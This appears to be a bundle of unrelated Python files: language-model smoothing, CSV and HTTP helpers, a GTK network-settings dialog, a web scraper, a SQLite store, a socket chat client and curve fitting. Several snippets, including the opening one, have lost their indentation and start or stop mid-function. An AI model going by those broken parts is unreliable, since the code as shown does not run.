if(row_sum == 0):
print("Report ROW SUM ZERO SCNG")
TransitionMat[row, :] /= row_sum
TransitionMat[row, row] = 0
else:
wordList = []
for tupleSet in tuplesMain:
for tup in tupleSet:
wordList.append(tup[2])
for row in range(nodeCount):
for col in range(nodeCount):
if row != col:
try:
TransitionMat[row][col] = self.w2w_samecng_fullmat[wordList[row]][wordList[col]]
except KeyError:
TransitionMat[row][col] = 0
else:
TransitionMat[row][col] = 0
row_sum = np.sum(TransitionMat[row, :])
if row_sum != 0:
TransitionMat[row, :] /= row_sum
else:
TransitionMat[row, :] /= 1/(nodeCount - 1)
TransitionMat[row, row] = 0
return TransitionMat
def get_v2c_ranking(self, wordList, cngList, verbs):
# Higher is better
v2c_fullMat = self.v2c_fullMat
ranks = np.zeros(len(cngList))
for vi in verbs:
tempRank = np.zeros(len(cngList))
v = wordList[vi]
# print(v)
for i in range(len(cngList)):
if i not in verbs:
c = str(cngList[i])
if c in v2c_fullMat[v]:
tempRank[i] = v2c_fullMat[v][c]
else:
tempRank[i] = 0
ranks = np.max((tempRank, ranks), axis = 0)
# print(ranks)
s = np.sum(ranks)
if(s > 0):
ranks /= s
return ranks
def kn_word2word(self, word_a, word_b):
    """Kneser-Ney style estimate of P(word_b | word_a) from co-occurrence counts."""
    co_mat = self.fullCo_oc_mat
    total_co_oc = self.total_co_oc          # read but unused; kept to mirror original
    total_context = self.total_context
    context_count = self.context_count
    co_oc_count = self.co_oc_count
    delta = 0.5
    # Absolute-discounting back-off weight for word_a.
    backoff = delta * max(context_count[word_a], 1) / (co_oc_count[word_a] + 1)
    # NOTE(review): membership is tested on co_mat[word_b] but the count is
    # read from co_mat[word_a][word_b] — only safe if the matrix is symmetric;
    # confirm against how fullCo_oc_mat is built.
    if word_a in co_mat[word_b]:
        discounted = max(co_mat[word_a][word_b] - delta, 0) / (co_oc_count[word_a] + 1)
        p_b = context_count[word_b] / total_context
        return discounted + backoff * p_b
    p_b = max(context_count[word_b], 1) / total_context
    return backoff * p_b
def kn_cng2cng(self, cng_a, cng_b):
    """Kneser-Ney style estimate of P(cng_b | cng_a) over CNG-tag indices.

    Unknown tags fall back to a small constant floor probability.
    """
    index_map = self.cng2index_dict
    mat = self.cng2cngFullMat
    context_count = self.t2t_context_count
    total_contexts = self.t2t_total_contexts
    total_co_oc = self.t2t_total_co_oc      # read but unused; kept to mirror original
    co_oc_count = self.t2t_co_oc_count
    try:
        idx_a = index_map[str(cng_a)]
        idx_b = index_map[str(cng_b)]
    except KeyError:
        # Unseen CNG tag: return the floor probability.
        return 1 / 440000
    delta = 0.5
    backoff = delta * max(context_count[idx_a], 1) / (co_oc_count[idx_a] + 1)
    if mat[idx_a, idx_b] > 0:
        discounted = max(mat[idx_a, idx_b] - delta, 0) / (co_oc_count[idx_a] + 1)
        p_b = context_count[idx_b] / total_contexts
        return discounted + backoff * p_b
    p_b = max(context_count[idx_b], 1) / total_contexts
    return backoff * p_b
def kn_word2word_samecng(self, word_a, word_b):
    """Kneser-Ney style estimate of P(word_b | word_a) restricted to
    same-CNG co-occurrences."""
    co_mat = self.w2w_samecng_fullmat
    total_co_oc = self.samecng_total_co_oc      # read but unused; kept to mirror original
    total_context = self.samecng_total_context
    context_count = self.samecng_context_count
    co_oc_count = self.samecng_co_oc_count
    delta = 0.5
    # Absolute-discounting back-off weight for word_a.
    backoff = delta * max(context_count[word_a], 1) / (co_oc_count[word_a] + 1)
    # NOTE(review): membership tested on co_mat[word_b], count read from
    # co_mat[word_a][word_b] — only safe if the matrix is symmetric.
    if word_a in co_mat[word_b]:
        discounted = max(co_mat[word_a][word_b] - delta, 0) / (co_oc_count[word_a] + 1)
        p_b = context_count[word_b] / total_context
        return discounted + backoff * p_b
    p_b = max(context_count[word_b], 1) / total_context
    return backoff * p_b
|
import sys
import csv
def WriteCSV(fileName, data):
    """Write *data* (an iterable of rows) to *fileName* as CSV.

    BUGFIX: the original used the Python-2-only ``file(fileName, 'wb')``
    builtin (a NameError on Python 3) and leaked the handle on error.
    Uses ``newline=''`` as required by the csv module on Python 3.
    """
    with open(fileName, 'w', newline='') as csvfile:
        csv.writer(csvfile).writerows(data)
def ReadCSV(fileName):
    """Return the contents of *fileName* as a list of CSV rows (lists of str).

    BUGFIX: the original used the Python-2-only ``file(fileName, 'rb')``
    builtin and never closed the handle; a context manager fixes both.
    """
    with open(fileName, newline='') as csvfile:
        return list(csv.reader(csvfile))
import requests
from concurrent import futures
class ApiClient:
    """Thin wrapper over ``requests`` with a concurrent fan-out helper."""

    @staticmethod
    def get(endpoint):
        """Issue a blocking GET and return the raw Response."""
        return requests.get(endpoint)

    def get_concurrently(self, endpoints):
        """GET every endpoint in parallel; return the decoded JSON bodies
        in the same order as *endpoints*.

        BUGFIX: an empty list used to raise ValueError, because
        ``ThreadPoolExecutor(max_workers=0)`` is invalid.
        """
        if not endpoints:
            return []
        with futures.ThreadPoolExecutor(max_workers=len(endpoints)) as executor:
            results = executor.map(self.get, endpoints)
            return [result.json() for result in results]
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import network
import gi
gi.require_version('Gtk', '3.0')
from gi.repository import Gtk
class MainWindow(Gtk.Window):
    """Network-settings window: pick DHCP or enter a static IP configuration.

    Widget references are stored on the class so the signal handlers can
    reach them without extra instance plumbing.

    BUGFIX: the Python-2-only ``print`` statements were converted to the
    parenthesized form, which is valid on both Python 2 and Python 3.
    """

    networkInfos = None        # interface info dicts from network.getNetworkInfo()
    button_dhcp = None         # radio: obtain an IP automatically
    button_setting_ip = None   # radio: use a static IP
    entry_ip = None
    entry_mask = None
    entry_gateway = None
    entry_dns = None

    def __init__(self):
        Gtk.Window.__init__(self, title='网络设置')
        self.set_border_width(10)
        self.set_position(Gtk.WindowPosition.CENTER)
        self.set_resizable(False)
        self.notebook = Gtk.Notebook()
        self.add(self.notebook)
        MainWindow.networkInfos = network.getNetworkInfo()
        grid = Gtk.Grid()
        grid.set_row_spacing(10)
        grid.set_column_spacing(20)
        self.page = Gtk.Box()
        self.page.set_border_width(20)
        # One tab per interface is implied, but only the first one is shown.
        self.notebook.append_page(self.page, Gtk.Label(MainWindow.networkInfos[0].get('id')))
        self.page.add(grid)
        MainWindow.button_dhcp = Gtk.RadioButton.new_with_label_from_widget(None, '自动获取IP地址')
        separator1 = Gtk.HSeparator()
        MainWindow.button_setting_ip = Gtk.RadioButton.new_with_mnemonic_from_widget(MainWindow.button_dhcp, '设置IP地址')
        lable_ip = Gtk.Label('IP地址:')
        MainWindow.entry_ip = Gtk.Entry()
        MainWindow.entry_ip.set_max_length(15)
        lable_mask = Gtk.Label('子网掩码:')
        MainWindow.entry_mask = Gtk.Entry()
        MainWindow.entry_mask.set_max_length(15)
        lable_gateway = Gtk.Label('默认网关:')
        MainWindow.entry_gateway = Gtk.Entry()
        MainWindow.entry_gateway.set_max_length(15)
        lable_dns = Gtk.Label('DNS:')
        MainWindow.entry_dns = Gtk.Entry()
        MainWindow.entry_dns.set_max_length(15)
        separator2 = Gtk.HSeparator()
        button_ok = Gtk.Button.new_with_label('确定')
        button_cancel = Gtk.Button.new_with_label('取消')
        # Lay everything out on the grid (col, row, width, height).
        grid.attach(MainWindow.button_dhcp, 0, 0, 3, 1)
        grid.attach(separator1, 0, 1, 3, 1)
        grid.attach(MainWindow.button_setting_ip, 0, 2, 3, 1)
        grid.attach(lable_ip, 0, 3, 1, 1)
        grid.attach(MainWindow.entry_ip, 1, 3, 2, 1)
        grid.attach(lable_mask, 0, 4, 1, 1)
        grid.attach(MainWindow.entry_mask, 1, 4, 2, 1)
        grid.attach(lable_gateway, 0, 5, 1, 1)
        grid.attach(MainWindow.entry_gateway, 1, 5, 2, 1)
        grid.attach(lable_dns, 0, 6, 1, 1)
        grid.attach(MainWindow.entry_dns, 1, 6, 2, 1)
        grid.attach(separator2, 0, 7, 3, 1)
        grid.attach(button_ok, 1, 8, 1, 1)
        grid.attach(button_cancel, 2, 8, 1, 1)
        #if MainWindow.networkInfos[0].get('method') == 'manual':
        if not MainWindow.networkInfos[0].get('is_auto'):
            # Static configuration: pre-fill the entries with current values.
            MainWindow.button_setting_ip.set_active(True)
            MainWindow.entry_ip.set_text(MainWindow.networkInfos[0].get('ip'))
            MainWindow.entry_mask.set_text(MainWindow.networkInfos[0].get('subnet_mask'))
            MainWindow.entry_gateway.set_text(MainWindow.networkInfos[0].get('gateway'))
            MainWindow.entry_dns.set_text(MainWindow.networkInfos[0].get('dns'))
        else:
            # DHCP: the entries are informational only.
            MainWindow.entry_ip.set_editable(False)
            MainWindow.entry_mask.set_editable(False)
            MainWindow.entry_gateway.set_editable(False)
            MainWindow.entry_dns.set_editable(False)
        MainWindow.button_dhcp.connect("toggled", self.on_button_toggled, 'dhcp')
        MainWindow.button_setting_ip.connect("toggled", self.on_button_toggled, 'setting_ip')
        button_ok.connect("clicked", self.on_button_ok_clicked)
        button_cancel.connect("clicked", self.on_button_cancel_clicked)

    def on_button_toggled(self, button, name):
        """Enable/disable the address entries when the radio selection changes."""
        print(name)
        if name == 'dhcp':
            MainWindow.entry_ip.set_text('')
            MainWindow.entry_mask.set_text('')
            MainWindow.entry_gateway.set_text('')
            MainWindow.entry_dns.set_text('')
            MainWindow.entry_ip.set_editable(False)
            MainWindow.entry_mask.set_editable(False)
            MainWindow.entry_gateway.set_editable(False)
            MainWindow.entry_dns.set_editable(False)
        else:
            #if MainWindow.networkInfos[0].get('method') == 'manual':
            if not MainWindow.networkInfos[0].get('is_auto'):
                MainWindow.entry_ip.set_text(MainWindow.networkInfos[0].get('ip'))
                MainWindow.entry_mask.set_text(MainWindow.networkInfos[0].get('subnet_mask'))
                MainWindow.entry_gateway.set_text(MainWindow.networkInfos[0].get('gateway'))
                MainWindow.entry_dns.set_text(MainWindow.networkInfos[0].get('dns'))
            MainWindow.entry_ip.set_editable(True)
            MainWindow.entry_mask.set_editable(True)
            MainWindow.entry_gateway.set_editable(True)
            MainWindow.entry_dns.set_editable(True)

    def on_button_ok_clicked(self, button):
        """Apply the chosen configuration, then quit the GTK main loop."""
        if MainWindow.button_dhcp.get_active():
            network.setDHCP(MainWindow.networkInfos[0].get('id'), MainWindow.networkInfos[0].get('mac'))
        else:
            self.ip = MainWindow.entry_ip.get_text()
            self.mask = MainWindow.entry_mask.get_text()
            self.gateway = MainWindow.entry_gateway.get_text()
            self.dns = MainWindow.entry_dns.get_text()
            # All four fields must be present and well-formed IPv4 strings.
            if self.ip and self.mask and self.gateway and self.dns and network.isIP(self.ip) and network.isIP(self.mask) and network.isIP(self.gateway) and network.isIP(self.dns):
                network.setNetwork(MainWindow.networkInfos[0].get('id'), MainWindow.networkInfos[0].get('mac'), self.ip, self.mask, self.gateway, self.dns)
            else:
                print('address error!')
        Gtk.main_quit()

    def on_button_cancel_clicked(self, button):
        """Discard changes and quit the GTK main loop."""
        Gtk.main_quit()
def main():
    """Create the settings window and run the GTK main loop."""
    window = MainWindow()
    window.connect("destroy", Gtk.main_quit)
    window.show_all()
    Gtk.main()


if __name__ == '__main__':
    main()
|
class Accord:
    """A chord: an ordered collection of notes."""

    def __init__(self, notes):
        # Copy into a fresh list so mutating the caller's sequence later
        # doesn't leak into the chord.
        self.notes = []
        for note in notes:
            self.notes.append(note)

    def AddNote(self, note):
        """Append a single note to the chord.

        BUGFIX: the method was declared without ``self``, so every call
        bound the instance to ``note`` and then hit a NameError on
        ``self.notes``.
        """
        self.notes.append(note)
|
# Pull in the Decoder base class, then import every sibling submodule of
# this package so Decoder implementations register themselves as a side
# effect of being imported.
from starfish.pipeline import import_all_submodules
from ._base import Decoder
import_all_submodules(__file__, __package__)
|
# -*- coding: utf-8 -*-
"""
Created by
https://github.com/piszewc/

Scrape the first sortable wikitable from the Wikipedia best-selling-singles
page into a pandas DataFrame.

NOTE(review): the original docstring claimed every table is saved to a CSV
file in the current location, but no CSV write appears below — either the
claim or the script is incomplete; confirm intent.
"""
import requests
import pandas as pd
from bs4 import BeautifulSoup

# Target page, fetched once as raw HTML.
page_html = "https://en.wikipedia.org/wiki/List_of_best-selling_singles"
page = requests.get(page_html).text
soup = BeautifulSoup(page, "lxml")
data = []
# Only the first 'wikitable sortable' on the page is parsed.
table = soup.find('table', {'class':'wikitable sortable'})
table_body = table.find('tbody')
header = table_body.find_all('th')
# NOTE: the comprehension deliberately rebinds `header` from tags to strings.
header = [header.text.strip() for header in header]
count_tables = soup.find_all('table')  # unused; presumably left from debugging
rows = table_body.find_all('tr')
for row in rows:
    cols = row.find_all('td')
    cols = [ele.text.strip() for ele in cols]
    data.append([ele for ele in cols if ele]) # Get rid of empty values
# The first <tr> holds only <th> cells, so data[0] is empty; replace it
# with the extracted header row.
data[0] = header
dftable = pd.DataFrame(data[1:], columns=data[0])
# Independent cross-check: let pandas parse the page's first table itself.
site = pd.read_html(page_html)[0]
# Runtime 28 ms, Memory Usage 14.1 MB
def toGoatLatin(self, S: str) -> str:
    """Convert sentence *S* to Goat Latin.

    Vowel-initial words get the suffix "ma"; consonant-initial words move
    their first letter to the end before the suffix.  The i-th word
    (1-based) additionally receives i trailing "a" characters.
    """
    vowels = set("aeiouAEIOU")
    transformed = []
    for position, word in enumerate(S.split(" "), start=1):
        suffix = "ma" + "a" * position
        if word[0] in vowels:
            transformed.append(word + suffix)
        else:
            # Rotate the leading consonant to the end before the suffix.
            transformed.append(word[1:] + word[0] + suffix)
    return " ".join(transformed)
import json
import os
import sqlite3
import traceback
# Absolute path of the SQLite database file (resolved against the CWD at
# import time, so the process must be started from the project root).
DATABASE = os.getcwd()+'/databases/Data.db'
# Name of the per-player stats table.
TABLE = 'PlayerInfo'
class Player:
    """Per-user persistence layer over the SQLite PlayerInfo table.

    On construction it connects to the database, ensures the table and the
    user's row exist, migrates columns to match the JSON config, and loads
    the row into ``self.data``.

    BUGFIX: removed the unresolved git merge-conflict markers
    (``<<<<<<< HEAD`` / ``=======`` / ``>>>>>>> 6a4f225``) that made this
    module a SyntaxError; the branch keeping ``purgeAll`` was taken.
    """

    def __init__(self, bot, ctx, user=None):
        """*bot*/*ctx* come from the bot framework; *user* overrides ctx.author."""
        self.config = json.load(open(os.getcwd() + '/config/config.json'))
        self.added_fields = []
        self.removed_fields = []
        self.bot = bot
        self.ctx = ctx
        # NOTE(review): this mutates the shared ctx object in place —
        # confirm callers expect ctx.author to be replaced.
        self.ctx.author = user if user else ctx.author
        try:
            self.conn = sqlite3.connect(DATABASE)
        except sqlite3.Error:
            self.conn = None
            traceback.print_exc()
        self.cursor = self.conn.cursor()
        self._create_table()
        self._get_player_info()

    def _create_table(self):
        """Create the base table (primary key only) if it doesn't exist."""
        query = f"""CREATE TABLE IF NOT EXISTS {TABLE} (ID BIGINT PRIMARY KEY)"""
        self.cursor.execute(query)
        self.conn.commit()

    def _update_table(self):
        """Sync the table's columns with the config: add missing fields and
        rebuild the table without fields marked for deletion.

        Raises IndexError (via ``fetchall()[0]``) when the table has no
        rows; ``_get_player_info`` uses that as the "player missing" signal.
        """
        query = f"""SELECT * FROM {TABLE}"""
        cursor = self.cursor.execute(query)
        self.added_fields = []
        self.removed_fields = [name for name in self.config['Database Info']['Delete Fields'] if name in [field[0] for field in cursor.description]]
        info = self.cursor.fetchall()[0]
        if info:
            for column in self.config['Database Info']['All Fields']:
                try:
                    query = f"""ALTER TABLE {TABLE} ADD COLUMN {column} {self.config['Database Info'][column]['Type']} DEFAULT {self.config['Database Info'][column]['Value']}"""
                    self.cursor.execute(query)
                    self.conn.commit()
                    self.added_fields.append(column)
                except sqlite3.OperationalError:
                    # Column already exists — nothing to add.
                    pass
                except Exception:
                    traceback.print_exc()
            if self.config['Database Info']['Delete Fields']:
                # SQLite (pre-3.35) has no DROP COLUMN: copy the surviving
                # columns into a fresh table and swap it in.
                fields = [(field, self.config['Database Info'][field]['Type'], self.config['Database Info'][field]['Value']) for field in self.config['Database Info']['All Fields'] if field not in self.config['Database Info']['Delete Fields']]
                query = f"""CREATE TABLE IF NOT EXISTS new_{TABLE} ({', '.join([f'{field[0]} {field[1]} DEFAULT {field[2]}' for field in fields])})"""
                self.cursor.execute(query)
                query = f"""INSERT INTO new_{TABLE} SELECT {', '.join([field[0] for field in fields])} FROM {TABLE}"""
                self.cursor.execute(query)
                query = f"""DROP TABLE IF EXISTS {TABLE}"""
                self.cursor.execute(query)
                query = f"""ALTER TABLE new_{TABLE} RENAME TO {TABLE}"""
                self.cursor.execute(query)
                self.conn.commit()

    def _get_player_info(self):
        """Load this user's row into ``self.data``, creating the row if absent."""
        try:
            self._update_table()
        except IndexError:
            # Empty table: create the player's row, then retry once.
            self._create_player()
            return self._get_player_info()
        query = f"SELECT * FROM {TABLE} WHERE id = ?"
        self.cursor.execute(query, (self.ctx.author.id,))
        info = self.cursor.fetchall()[0]
        self.data = {}
        for key, value in zip(self.config['Database Info']['All Fields'], info):
            self.data[key] = value

    def _create_player(self):
        """Insert a fresh row for this user (other columns take their defaults)."""
        query = f"""INSERT INTO {TABLE} VALUES (?)"""
        self.cursor.execute(query, (self.ctx.author.id,))
        self.conn.commit()

    def update_value(self, column, value):
        """Set a single column for this user and refresh ``self.data``."""
        query = f"UPDATE {TABLE} SET {column} = ? WHERE ID = ?"
        self.cursor.execute(query, (value, self.ctx.author.id))
        self.conn.commit()
        self._get_player_info()

    def purgeAll(self):
        """Close the connection and delete the database file entirely."""
        self.conn.close()
        os.remove(DATABASE)
|
# coding=utf-8
#
from ft_converter.utility import logger
from ft_converter.match import match_repeat
#
# To be completed. See small_program.match_transfer.py
#
# def refine_price(transaction_list):
# """
# Refine the price for a transaction. When a transaction's price is zero,
# i.e., absent from the FT file, its price will be calculated and saved.
# 1. For CSA and IATSA transactions, use the PRINB and FXRATE to calculate
# the price.
# 2. For CSW and IATSW transactions, match them to a CSA or IATSA transaction
# on the same day and for the same bond, then use the price of the
# CSA/IATSA transaction as the price.
# 3. For those CSW, IATSW transactions that cannot be matched, leave the
# price as zero.
# Return the list of CSW and IATSW transactions that cannot be matched.
# """
# transfer_in, transfer_out = filter_transfer_transaction(transaction_list)
# for transaction in transfer_in:
# transaction['TRADEPRC'] = abs(transaction['PRINB']*transaction['FXRATE']/transaction['QTY']*100)
# matched, unmatched = match_repeat(transfer_out, transfer_in, map_transfer)
# for (transaction_out, transaction_in) in matched:
# transaction_out['TRADEPRC'] = transaction_in['TRADEPRC']
# return unmatched
# def filter_transfer_transaction(transaction_list):
# transfer_in = []
# transfer_out = []
# for transaction in transaction_list:
# if transaction['TRADEPRC'] > 0:
# logger.info('filter_transfer_transaction(): transaction {0} on {1} for bond {2} has a price {3}'.
# format(transaction['TRANTYP'], transaction['TRDDATE'],
# transaction['SCTYID_ISIN'], transaction['TRADEPRC']))
# continue
# if transaction['TRANTYP'] in ['CSA', 'IATSA']:
# transfer_in.append(transaction)
# elif transaction['TRANTYP'] in ['CSW', 'IATSW']:
# transfer_out.append(transaction)
# return transfer_in, transfer_out
# def map_transfer(transfer_out, transfer_in):
# """
# Map a transfer out transaction (CSW, IATSW) to a transfer in (CSA, IATSA).
# """
# if transfer_out['EventDate'] == transfer_in['EventDate'] \
# and transfer_out['SCTYID_ISIN'] == transfer_in['SCTYID_ISIN'] \
# and transfer_out['SCTYID_ISIN'] != '':
# return True
# return False |
from kivy.app import App
from kivy.uix.widget import Widget
from kivy.uix.gridlayout import GridLayout
from kivy.uix.scrollview import ScrollView
from kivy.core.window import Window
import socket
import thread
# Chat-server address.  The TCP connection is opened at import time and the
# socket `s` is shared by every handler in MainGridLayout below.
host = "192.168.0.101"
port = 9009
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
class MainGridLayout(GridLayout):
    # Full chat transcript displayed in the label.  Declared on the class;
    # each instance rebinds it on the first update.
    message_to_send = ""
    def __init__(self, **kwargs):
        # Bind the keyboard, greet the user, and start the background
        # receive loop over the module-level socket `s`.
        super(MainGridLayout, self).__init__(**kwargs)
        Window.bind(on_key_down=self.key_action)
        self.ids.label1.text = str("Welcome")
        thread.start_new_thread(self.handleClientMessages, ())
    def key_action(self, *args):
        # args[1] is the keycode; 13 == Enter/Return triggers a send.
        if args[1] == 13:
            self.send_message()
    def Display_Message(self, message_to_send):
        # Replace the label text with the full transcript.
        self.ids.label1.text = str(message_to_send)
    def send_message(self):
        # Send off-thread so the UI doesn't block on the socket.
        thread.start_new_thread(self.handleSentMessages, (self.ids.entry.text,))
    def handleSentMessages(self, message):
        # Echo locally, clear the entry box, then push to the server.
        self.message_to_send = self.message_to_send + "Pawan: " + message + "\n"
        self.Display_Message(self.message_to_send)
        self.ids.entry.text = ""
        s.send(message + "\n")
    def handleClientMessages(self):
        # Blocking receive loop: append whatever the server sends to the
        # transcript until the connection drops, then close the socket.
        while 1:
            try:
                data = s.recv(1024)
                print data
                if not data:
                    break
                self.message_to_send = self.message_to_send + str(data)
                self.Display_Message(self.message_to_send)
            except:
                # NOTE(review): bare except hides real errors; kept as-is
                # because this is Python-2-era code (`thread`, print stmt).
                break
        s.close()
class MainApp(App):
    """Kivy application whose root widget is the chat grid."""
    def build(self):
        root = MainGridLayout()
        return root
# Script entry point: start the Kivy app.
if __name__ == '__main__':
    MainApp().run()
|
import sys
import os.path
sys.path.append(os.path.join(os.pardir,os.pardir))
import disaggregator as da
import disaggregator.PecanStreetDatasetAdapter as psda
import argparse
# Parse the appliance name to query for from the command line.
parser = argparse.ArgumentParser(description='Process some integers.')
parser.add_argument('appliance')
args = parser.parse_args()

# NOTE(review): credentials are placeholders; supply real ones via config.
db_url = "postgresql://USERNAME:PASSWORD@db.wiki-energy.org:5432/postgres"
psda.set_url(db_url)

schema = 'shared'
tables = [u'validated_01_2014',
          u'validated_02_2014',
          u'validated_03_2014',
          u'validated_04_2014',
          u'validated_05_2014',]

# Collect, per monthly table, the dataids that have real readings for the
# appliance, then print the ids common to every month.
ids = []
for table in tables:
    ids.append(psda.get_dataids_with_real_values(schema, table, args.appliance))
# BUGFIX: parenthesized print works under both Python 2 and Python 3
# (the bare print statement is a SyntaxError on Python 3).
print(sorted(da.utils.get_common_ids(ids)))
|
def kmax(arr, k, n):
    """Print the k largest non-overlapping subarray sums of arr[:n].

    Runs Kadane's algorithm k times; after each round the chosen window is
    masked with -inf in place so later rounds cannot reuse it.  Note that
    *arr* is mutated.
    """
    NEG_INF = -float("inf")
    for round_no in range(1, k + 1):
        best_sum = NEG_INF
        running = 0
        best_start = best_end = 0
        window_start = 0
        for idx in range(n):
            running += arr[idx]
            if best_sum < running:
                best_sum = running
                best_start = window_start
                best_end = idx
            if running < 0:
                # Negative prefix can never help: restart after idx.
                running = 0
                window_start = idx + 1
        print("Maximum non-overlapping sub-array sum",
              round_no, ": ", best_sum, ", starting index: ",
              best_start, ", ending index: ", best_end, ".", sep = "")
        # Mask the chosen window so it cannot be selected again.
        for pos in range(best_start, best_end + 1):
            arr[pos] = NEG_INF
        print()
# Demo runs: same inputs as before, sizes derived from the lists themselves.
sample_a = [4, 1, 1, -1, -3, -5, 6, 2, -6, -2]
kmax(sample_a, 3, len(sample_a))

sample_b = [5, 1, 2, -6, 2, -1, 3, 1]
kmax(sample_b, 2, len(sample_b))
|
'''
see also gauss_fitting.py
here:
do_linear_fit(data)
do_quadratic_fit(data)
do_cubic_fit(data)
do_exp_fit(data)
do_gauss_fit(data)
do_logistic_fit(data)
'''
from __future__ import print_function
from __future__ import division
import numpy as np
import scipy.odr
import scipy.optimize as optimize
import matplotlib.pyplot as plt
import math
def do_lower_linear_guess(data, no_points):
    '''
    Provide a lower estimate for a linear background, useful as starting
    parameters for fitting complicated functions.

    Evenly samples no_points points from data[:,0], chooses the minimum
    absolute slope between the lowest-y sampled point and the others, and
    an offset such that data - linear fit is always positive.

    Returns (slope, offset).
    '''
    datalength = len(data[:,0])
    selected_indexes = [x*int(datalength/no_points) for x in range(no_points)]
    selected_indexes.append(datalength-1)
    points = data[selected_indexes,:]
    # Sort the sampled points by y-value.
    # BUGFIX: the original called .sort() on a zip object and passed zip
    # objects straight to np.asarray, which only worked on Python 2 where
    # zip returned a list; sorted()/list() restore py3 compatibility.
    switch = sorted(zip(points[:,1], points[:,0]))
    switch = np.asarray(switch)
    points = np.asarray(list(zip(switch[:,1], switch[:,0])))
    slopes = [abs((points[0,1]-points[x+1,1])/(points[0,0]-points[x+1,0])) for x in range(no_points-1)]
    slope = min(slopes)
    # Recover the sign of the overall trend of the data.
    slope = np.sign(data[-1,1] - data[0,1])*slope
    offset_guess = (-points[0,0]*slope) + points[0,1]
    residual = data[:,1] - linear_func([slope, offset_guess], data[:,0])
    # Lower the offset so the fitted line sits below every data point.
    offset = offset_guess + residual.min()
    return slope, offset
def empirical_func(p, t, data):
    """Evaluate p[0] * data(t + p[2]) + p[1], where *data* is an (N, 2)
    table interpolated linearly along its first column."""
    shifted = np.interp(t + p[2], data[:, 0], data[:, 1])
    return p[0] * shifted + p[1]
def do_empirical_fit(data, empirical_function, verbose=False):
    '''
    tested
    Fit data to a scaled/shifted copy of a measured curve: the model is
    A0 * empirical_function(t + A2) + A1.
    Returns beta = (A0, A1, A2).
    '''
    def fit_function(p,t):
        # Bind the measured curve into the (p, t) signature ODR expects.
        return empirical_func(p,t,empirical_function)
    _func = fit_function
    Model = scipy.odr.Model(_func)
    Data = scipy.odr.RealData(data[:,0], data[:,1])
    startguess = [1,0,0] # no changes
    Odr = scipy.odr.ODR(Data, Model, startguess , maxit = 1000000)
    # fit_type=2: ordinary least squares (no errors-in-variables).
    Odr.set_job(fit_type=2)
    output = Odr.run()
    #output.pprint()
    beta = output.beta
    betastd = output.sd_beta
    residual = _func(beta, data[:,0]) - data[:,1]
    if verbose:
        fig, ax = plt.subplots()
        # print "poly", fit_np
        print("fit result amp: \n", beta[0])
        print("fit result offset: \n", beta[1])
        print("fit result shift: \n", beta[2])
        ax.plot(data[:,0], data[:,1], "bo")
        # plt.plot(data[:,0], numpy.polyval(fit_np, data[:,0]), "r--", lw = 2)
        ax.plot(data[:,0], _func(beta, data[:,0]), "r--", lw = 2)
        # ax.plot(data[:,0], _func([max_guess, min_guess, inflection_guess, sigma_guess ], data[:,0]), "g--", lw = 2)
        plt.tight_layout()
        plt.show()
    return beta
def guess_period_scan(data, period_guess=None, verbose=False):
    """Estimate the dominant period of data[:,1] by brute-force correlation.

    Correlates the mean-subtracted signal against unit sine waves over a
    range of candidate periods (72 trial phases each) and returns the
    period with the strongest response.  *period_guess* may be None (scan
    a default range) or an explicit sequence of candidate periods.
    """
    test_data = data[:,1]-data[:,1].mean()
    if type(period_guess)==type(None):
        # Default scan: periods from 1 up to half the record length.
        scan_range = np.linspace(1,data.shape[0]/2,data.shape[0]*2)
    else:
        scan_range = np.asarray(period_guess)
    correlation=[]
    for period in scan_range:
        p_correlation=0
        # Keep the best correlation over trial phases for this period.
        for phase in np.linspace(0,360,72):
            probe = sin_func([1,phase,period,0],data[:,0])
            p_correlation=max(np.sum(probe*test_data),p_correlation)
        correlation.append(p_correlation)
    if verbose:
        plt.plot(scan_range,correlation)
    return scan_range[np.asarray(correlation).argmax()]
def sin_func(p, t):
    '''
    Sine with amplitude/phase/period/offset parameters:
    p[0] = amp, p[1] = phase in deg, p[2] = period, p[3] = offset.
    Evaluates |p[0]| * sin(2*pi*(t/|p[2]| + p[1]/360)) + p[3].
    '''
    phase_in_turns = t/np.abs(p[2]) + p[1]/360
    return np.abs(p[0])*np.sin(phase_in_turns*2*np.pi) + p[3]
def do_sin_fit(data, verbose = False,period_guess=None):
    """Fit data to |amp|*sin(2*pi*(t/period + phase/360)) + offset via ODR.

    period_guess may be a number, the string 'SCAN' (brute-force period
    search), another string parsed as float, a list/ndarray of candidate
    periods to scan, or None (period guess of 0).
    Returns beta = [amp, phase_deg, period, offset] with amp, period >= 0.
    """
    _func = sin_func
    Model = scipy.odr.Model(_func)
    Data = scipy.odr.RealData(data[:,0], data[:,1])
    # Peak-to-peak amplitude and midpoint offset as starting values.
    amp_guess = np.max(data[:,1]) - np.min(data[:,1])
    phase_guess = 0.0
    offset_guess = 0.5*(np.max(data[:,1]) + np.min(data[:,1]))
    if type(period_guess) == type('asdf'):
        if period_guess.upper() == 'SCAN':
            period_guess = guess_period_scan(data,period_guess=None,verbose=verbose)
        else:
            period_guess = float(period_guess)
    if type(period_guess)==list:
        period_guess = guess_period_scan(data,period_guess=period_guess,verbose=verbose)
    if type(period_guess)==np.ndarray:
        period_guess = guess_period_scan(data,period_guess=period_guess,verbose=verbose)
    if type(period_guess)==type(None):
        period_guess=0
    if verbose:
        print('amp_guess = ', amp_guess)
        print('phase_guess = ', phase_guess)
        print('period_guess = ', period_guess)
        print('offset_guess = ', offset_guess)
    guess = [amp_guess, phase_guess, period_guess, offset_guess]
    Odr = scipy.odr.ODR(Data, Model, guess, maxit = 10000000)
    # fit_type=2: ordinary least squares.
    Odr.set_job(fit_type=2)
    output = Odr.run()
    #output.pprint()
    beta = output.beta
    betastd = output.sd_beta
    # sin_func only uses |amp| and |period|; report them as positive.
    beta[0] = np.abs(beta[0])
    beta[2] = np.abs(beta[2])
    if verbose :
        fig, ax = plt.subplots()
        # print "poly", fit_np
        print("fit result amp: \n", beta[0])
        print("fit result phase: \n", beta[1])
        print('fit_result period = ', beta[2])
        print("fit result offset: \n", beta[3])
        ax.plot(data[:,0], _func(beta, data[:,0]), "r--", lw = 2)
        ax.plot(data[:,0], data[:,1], "bo")
        # plt.plot(data[:,0], numpy.polyval(fit_np, data[:,0]), "r--", lw = 2)
        # ax.plot(data[:,0], _func([max_guess, min_guess, inflection_guess, sigma_guess ], data[:,0]), "g--", lw = 2)
        plt.tight_layout()
        plt.show()
    return beta
def sin360period_func(p, t):
    '''
    Sine with the period fixed at 360 (t in degrees):
